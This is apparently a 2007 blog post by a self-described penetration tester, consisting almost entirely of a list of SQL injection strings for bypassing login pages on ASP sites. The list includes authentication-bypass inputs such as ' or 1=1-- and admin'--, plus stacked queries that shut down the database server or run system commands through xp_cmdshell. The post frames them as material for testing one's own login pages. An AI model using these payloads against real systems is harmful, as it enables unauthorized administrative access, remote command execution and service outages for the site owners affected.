what i do?

Am an Information Risk Consultant and Penetration Tester, i specialize mostly in penetrating secure networks/computer systems where i simulate an organized professional attack against your organization, where after that a detailed report with weakness and exploited vectors are summarized. This will help you gain control over your infrastructures security and maximize your protection.

Saturday, April 28, 2007

INJECTIONS, ATTACKING ASP LOGIN PAGES

Hi,

I have been looking into alot of attacks, especially the shopadmin, on the login pages and other sites using different CMS and running ASP.NET, and i have seen that most of the sites especially hosted by the ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this articles, i will share with you some logins attemps, an attacker will use, try with and gain administration.

Username: admin'--
username: ' or 1=1--

Username : admin
Password : admin' or a


Username : admin
Password : admin' or a=a --

user='' or ''=''
pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--


Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --


username = admin' or '6'='6




' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail, incase u find these helpful.

Good weekend,

/Chuks

No comments: